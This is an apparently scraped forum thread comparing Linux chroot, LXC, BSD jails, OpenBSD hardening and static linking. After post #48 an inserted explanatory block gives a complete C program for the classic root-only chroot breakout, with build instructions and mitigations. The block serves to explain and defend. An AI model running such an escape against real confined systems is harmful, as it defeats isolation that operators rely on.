Starch Linux: OpenBSD Atop Arch's Linux Kernel


  • #46
    Originally posted by kraftman
    Because they're too smart to use Unix or Unix like OS while there's Linux.
    So they are too smart to use a Unix-like OS because of the existence of another Unix-like OS?
    Wow, your logic is so fucked up, it hurts.



    • #47
      Oh, and another comment:
      FreeBSD != OpenBSD.


      From what I've seen, OpenBSD is much better than FreeBSD in terms of having clean, bugless code.



      • #48
        Originally posted by kraftman
        It's exactly opposite.
        I know for sure that there are various known ways to break out of a chroot - if you are root, that is. Those are intentionally not fixed in Linux because security never was chroot's main purpose.

        If you blindly trust your Linux chroots you're gonna get burned.

        Even Linux chroot is more secure than BSD jails.
        I never claimed that BSD jails are more secure, because I don't know those.

        Not to mention containers.
        Linux containers (LXC) are not really safe either. There are several known ways to break out of LXC containers. They are slowly working on fixing those, but again, the main purpose of LXC is not security.

        There's also many more options on Linux that are more secure.
        True. The grsecurity patch adds various (at least 13) chroot restrictions so that chroot actually can be used for security.

        There is also a "container" project that is known to do containers/jails safely: Linux-VServer.

        My point is that you should be really careful how you use chroots and LXC - whether it is safer than BSD or not I don't know - or care. There are many other good reasons to stick with Linux.

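The root-only breakout ncopa is referring to is the textbook one described in the Linux chroot(2) manual page: chroot() changes the root directory but not the current working directory, and ".." is only clamped at the root, so a process that still holds CAP_SYS_CHROOT can climb out. The program below is an added example written for this page, not code from the thread or from any of the projects named in it. It enters a freshly created, empty chroot the careful way (chroot() followed by chdir("/")), confirms it is confined, then escapes and confirms the host filesystem is visible again. The scratch paths under /tmp are constructed for the demo; it assumes Linux and needs CAP_SYS_CHROOT (normally root) to do anything beyond reporting that chroot(2) was refused.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Results of escape_chroot(). */
enum { ESC_OK = 0, ESC_NOPRIV = 1, ESC_FAIL = 2 };

/*
 * The classic root-only escape from the current root directory:
 *   1. mkdir + chroot() into a scratch directory WITHOUT chdir(),
 *      which leaves the cwd outside the new root;
 *   2. chdir("..") repeatedly climbs to the real filesystem root,
 *      because ".." is only clamped at the (new) root directory;
 *   3. chroot(".") makes the real root the process root again.
 * Returns ESC_NOPRIV if chroot(2) is refused (no CAP_SYS_CHROOT),
 * ESC_OK if the escape worked, ESC_FAIL on any other error.
 */
int escape_chroot(const char *scratch)
{
    if (mkdir(scratch, 0700) != 0 && errno != EEXIST)
        return ESC_FAIL;
    if (chroot(scratch) != 0)
        return (errno == EPERM) ? ESC_NOPRIV : ESC_FAIL;
    for (int i = 0; i < 64; i++)       /* 64 levels is plenty for any tree */
        if (chdir("..") != 0)
            return ESC_FAIL;
    return chroot(".") == 0 ? ESC_OK : ESC_FAIL;
}

/* Outcomes of run_demo(). */
enum { DEMO_ESCAPED = 0, DEMO_NOPRIV = 1, DEMO_STILL_CONFINED = 2, DEMO_ERROR = 3 };

/*
 * End-to-end demo: enter an empty chroot properly (chroot + chdir("/")),
 * check that the jail's own host path no longer resolves, break out with
 * escape_chroot(), and check that the host path resolves again.
 */
int run_demo(void)
{
    char jail[] = "/tmp/chroot-demo-XXXXXX";   /* constructed scratch path */
    char sub[64], cwd[4096];
    struct stat st;

    if (!getcwd(cwd, sizeof cwd) || !mkdtemp(jail))
        return DEMO_ERROR;
    snprintf(sub, sizeof sub, "%s/escape", jail);

    if (chroot(jail) != 0 || chdir("/") != 0) {
        int e = errno;
        rmdir(jail);
        return e == EPERM ? DEMO_NOPRIV : DEMO_ERROR;
    }
    /* Confined: the jail's host path must not be visible from inside it. */
    if (stat(jail, &st) == 0)
        return DEMO_ERROR;

    if (escape_chroot("escape") != ESC_OK)
        return DEMO_ERROR;                    /* still inside; cannot clean up */

    /* Back on the host, the same path resolves again. */
    int out = stat(jail, &st) == 0 ? DEMO_ESCAPED : DEMO_STILL_CONFINED;
    rmdir(sub);
    rmdir(jail);
    if (chdir(cwd) != 0)
        return DEMO_ERROR;
    return out;
}

int main(void)
{
    static const char *names[] = { "escaped", "no privilege (chroot refused)",
                                   "still confined", "error" };
    int r = run_demo();
    printf("chroot escape demo: %s\n", names[r]);
    return r == DEMO_ESCAPED ? 0 : 1;
}
```

Build with `cc -o chroot-escape chroot-escape.c` and run it as root to see the breakout; as an unprivileged user it only reports that chroot(2) was refused. That refusal is the actual mitigation: if the confined workload must not be able to call chroot(2) again, drop CAP_SYS_CHROOT before starting it (for example with `capsh --drop=cap_sys_chroot`) or block the syscall with a seccomp filter. The grsecurity chroot restrictions mentioned above enforce the same kind of rule in the kernel.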


        • #49
          Originally posted by kraftman
          Don't make us laugh mentioning things that are something common.
          Feel free to laugh. As I said, OpenBSD was early with those features. Linux only got them in the last few years. Also, NX bit support in Linux is a bit limited. OpenBSD implemented a feature similar to NX for i386 early, even if the hardware does not support it. The other BSDs didn't have those features.

          You can actually get those features on Linux too, with the PaX patches.

          I know those things because I was around when the ProPolice patches entered gcc (gcc-3.3 -> gcc-4). Both OpenBSD and Gentoo Hardened did a lot of good work there.



          • #50
            Originally posted by gens
            ITS A PROJECT FOR A STATIC VERSION OF ARCH LINUX !!
            Static linking is generally a bad idea. You'll end up with multiple copies of the same code in memory -> bloat. You'll probably end up using more memory than with glibc.

            Check out Alpine Linux. It uses uClibc and BusyBox and shared libs.



            • #51
              Originally posted by ncopa
              I never claimed that bsd jails are more secure, because I don't know those.
              As far as I know, there is no known way to break out of a BSD jail in the default configuration on FreeBSD. If you modify a FreeBSD jail to add certain devices in /dev from the host to the jail, enable UNIX System V shared memory or a few other things, then it becomes possible to break out.



              • #52
                Originally posted by ryao
                As far as I know, there is no known way to break out of a BSD jail in the default configuration on FreeBSD. If you modify a FreeBSD jail to add certain devices in /dev from the host to the jail, enable UNIX System V shared memory or a few other things, then it becomes possible to break out.
                That is what I expected. Even the Wikipedia article says that one of the three goals for a jail is security, while Linux developers claim that chroot is not and never has been a security tool.

                I got a bit surprised to see someone claim that even Linux chroots are more secure than BSD jails. I guess someone on the internet is wrong...



                • #53
                  Originally posted by ncopa
                  That is what I expected. Even the Wikipedia article says that one of the three goals for a jail is security, while Linux developers claim that chroot is not and never has been a security tool.

                  I got a bit surprised to see someone claim that even Linux chroots are more secure than BSD jails. I guess someone on the internet is wrong...
                  Both jails and chroots are available on FreeBSD. They are not mutually exclusive. chroot is not and never has been a security tool on FreeBSD either.



                  • #54
                    Originally posted by systemd anals bsd
                    Linux chroots are far more secure than BSD jails or chroots. BSD jails make the crappy OS even more vulnerable.
                    Any facts on this? Or just your "informed opinion"?



                    • #55
                      Originally posted by ncopa
                      Static linking is generally a bad idea. You'll end up with multiple copies of the same code in memory -> bloat. You'll probably end up using more memory than with glibc.

                      Check out Alpine Linux. It uses uClibc and BusyBox and shared libs.

                      There are strong and weak points with both static and dynamic linking. I do not even presume to know all the details, but a static binary does not have to be executed via the linker, so it is generally started faster (you might lose RAM but you win CPU...). Other strong points of static binaries are that they are portable (you do not have to package a bundle of DLLs together with your binary) and will stay executable on a specific architecture/kernel combination for a _very_ long time. An all-static OS like Plan 9 is far from being bloated.

                      Another huge advantage is that the whole system does not break down if libc breaks.

                      For a standard desktop, static linking would probably be a bad thing. On the other hand, for small and truly "unixy" applications, static linking against light-weight libraries makes a lot of sense.

